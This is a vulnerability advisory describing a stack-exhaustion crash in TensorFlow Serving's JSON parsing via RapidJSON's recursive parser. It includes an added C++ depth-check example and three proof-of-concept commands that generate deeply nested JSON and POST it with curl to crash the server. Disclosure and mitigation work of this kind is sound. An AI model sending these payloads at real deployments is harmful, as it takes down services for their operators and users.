This vulnerability allows unauthenticated remote attackers to cause the server to stop responding to requests due to stack exhaustion when parsing malformed JSON input.
(, 2.17.0]
TensorFlow Serving uses RapidJSON to process JSON input. The function `ParseJson` in json-tensor.cc uses RapidJSON’s `ParseStream` function to parse the JSON input. The default behavior of RapidJSON’s parsing function is [to parse the input recursively](https://rapidjson.org/md_doc_features.html#Parsing:~:text=Parsing-,Recursive%20%28default%29,-and%20iterative%20parser) with no limit on the recursion depth. A malicious JSON string containing arrays or objects that are deeply nested inside one another can cause the server to crash.
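A bounded, non-recursive depth check of the kind a front end could apply before a recursive parser sees the request body, as an added example (not code from TensorFlow Serving, RapidJSON or this advisory). The names `DepthScan` and `scan_json_depth` and the limit of 64 are assumptions.

```cpp
#include <cstddef>
#include <iostream>
#include <string>

struct DepthScan {
    std::size_t max_depth;  // deepest nesting seen before the scan stopped
    bool within_limit;      // false once nesting exceeded the limit
};

// Single linear pass, no recursion: stops as soon as array/object nesting
// exceeds `limit`. Brackets inside string literals are ignored and backslash
// escapes are honoured, so \" does not terminate a string.
// This bounds depth only; it does not validate the JSON.
DepthScan scan_json_depth(const std::string& json, std::size_t limit) {
    std::size_t depth = 0, max_depth = 0;
    bool in_string = false, escaped = false;
    for (char c : json) {
        if (in_string) {
            if (escaped)        escaped = false;
            else if (c == '\\') escaped = true;
            else if (c == '"')  in_string = false;
            continue;
        }
        if (c == '"') {
            in_string = true;
        } else if (c == '[' || c == '{') {
            if (++depth > max_depth) max_depth = depth;
            if (depth > limit) return {max_depth, false};  // reject early
        } else if ((c == ']' || c == '}') && depth > 0) {
            --depth;  // unbalanced closers are left for the real parser to reject
        }
    }
    return {max_depth, true};
}

int main() {
    const std::size_t kLimit = 64;  // assumed; set to the deepest legitimate request
    // Constructed inputs: an ordinary request body and a deeply nested one.
    std::string ok = R"({"instances": [[1.0, 2.0], [5.0, "]]]]"]]})";
    std::string nested = "{\"instances\":" + std::string(50000, '[') + "1" +
                         std::string(50000, ']') + "}";
    DepthScan a = scan_json_depth(ok, kLimit), b = scan_json_depth(nested, kLimit);
    std::cout << (a.within_limit ? "accept" : "reject") << " depth " << a.max_depth << "\n";
    std::cout << (b.within_limit ? "accept" : "reject") << " depth " << b.max_depth << "\n";
    return 0;
}
```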
Run TensorFlow Serving by following the instructions at https://www.tensorflow.org/tfx/serving/docker.

Then, run any of the following commands in a shell:

- ```
  python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 500000 + "]" * 500000 + "}")' > /tmp/malicious.txt
  curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
  ```
- ```
  python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 50000 + "]" * 50000 + "}")' > /tmp/malicious.txt
  curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
  ```
- ```
  python -c 'print("{\"instances\":" + "[" * 50000 + "1" + "]" * 50000 + "}")' > /tmp/malicious.txt
  curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
  ```

The server will crash.
No mitigations are supplied for this issue.